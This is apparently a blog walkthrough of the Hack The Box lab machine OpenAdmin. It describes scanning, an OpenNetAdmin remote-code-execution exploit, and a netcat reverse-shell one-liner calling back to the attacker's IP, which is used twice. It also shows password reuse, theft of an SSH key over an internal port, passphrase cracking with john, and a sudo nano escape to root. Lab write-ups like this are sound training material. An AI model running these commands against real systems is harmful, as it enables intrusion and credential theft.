HTB OpenAdmin — Walkthrough

ENUMERATION

So let’s start enumeration with nmap scan

# nmap -A 10.10.10.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Apache is running on port 80, on visiting found that there is Apache default page without any information

Running directory brute forcing

# python3 dirsearch.py -u http://10.10.10.171/ -e / -t 50Extensions: / | HTTP method: get | Threads: 50 | Wordlist size: 6122Target: http://10.10.10.171/[07:40:24] Starting: 
[07:40:30] 200 - 11KB - /
[07:40:53] 200 - 11KB - /index.html
[07:40:57] 301 - 312B - /music -> http://10.10.10.171/music/
Task Completed

On visiting found directory /music, found many functionality after using all that nothing interesting was found. But when clicked on Login, it redirected to /ona/

where found that it is OpenNetAdmin 18.1.1 which is vulnerable to RCE

Initial Shell

The exploit I used is here

# python3 exploit.py exploit http://10.10.10.171/ona/

To get reverse shell I used netcat

# nc -vlp 443 //in attacker machine$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.196 443 >/tmp/f //in OpenAdmin machine

Privilege Escalate— jimmy

After some searching on google found that the database credentials are stored in /opt/ona/www/local/config/database_settings.inc.php in plaintext

ona_sys : n1nj4W4rri0R!

But no interesting information is found inside database, inside /home directory I found that there are two users jimmy and joanna, so I tried the database password as in case the same password is used for user account too

And found that the same password is used for user account jimmy

jimmy : n1nj4W4rri0R!

Privilege Escalate — joanna

When I was enumerating from www-data I found that a directory /var/www/internal which cannot be accessed by www-data, but can be accessed with user jimmy

drwxrwx---  2 jimmy    internal 4096 Nov 23 17:43 internal

Inside that there are 3 file

-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php

The content of main.php seems interesting and looks like the way to user joanna

# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

It looks like a application here but was not found during web enumeration and also not found any related to port 80, so I tried to find out if there is any addional port which is open

It is found that the port 52846 is only open internally that is for localhost only, I tried to access main.php on this port with the help of curl

$ curl -s localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
...-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

And found the private key for user joanna, but it needs passphrase to login so I cracked that with john

// Converting the key to hash to crack the passphrase
# python3 /usr/share/john/ssh2john.py joanna-ssh > hash
//Brute force to get passphrase with rockyou.txt
# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna-ssh)

Session completed

Found passphrase as bloodninjas and successfully logged in with the ssh key

# ssh joanna@10.10.10.171 -i joanna-ssh 
Enter passphrase for key 'joanna-ssh':bloodninjas

user.txt = c9b2cf07d********af62660f0c81b5f

Privilege Escalate — root

It was pretty straight forward, when I checked for sudo permission found that

(ALL) NOPASSWD: /bin/nano /opt/priv

To read root.txt

$ sudo /bin/nano /opt/priv
ctrl + R //Read file option in nano
/root/root.txt //In the field when nano ask for name

To get root shell

$ sudo /bin/nano /opt/priv
ctrl + R //Read file option in nano
ctlr + X //Execute command option in nano
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.196 443 >/tmp/f //In the field when nano ask for command
# nc -lvp 443 // In attacker machine

root.txt = 2f907ed450b3********4e8795d5b561

--

--

--

Security Researcher | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

01. Python Basics.

Web Form, MVC and DotVVM

How to Write your own Flight Controller Software — Part 2

UNIX Shell Command Line Interpreter — In a Nutshell

Deep Programming

Dark room with a backlit computer terminal and a screen showing colorful lines of code.

Vulnhub Write-up — Toppo

Redeeming Push Notifications

Initiating calls to Dart from the native side in the background with Flutter plugin.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vaibhav Joshi

Vaibhav Joshi

Security Researcher | OSCP

More from Medium

Opan’s ESP32 Project, Archive 4: External Sensor

Crodo.io — New IDO site on the Cronos network! Part 3

TryHackMe-GameZone Walkthrough

🥽 METACYBER 🥽 — LEARN PLAY CREATE EARN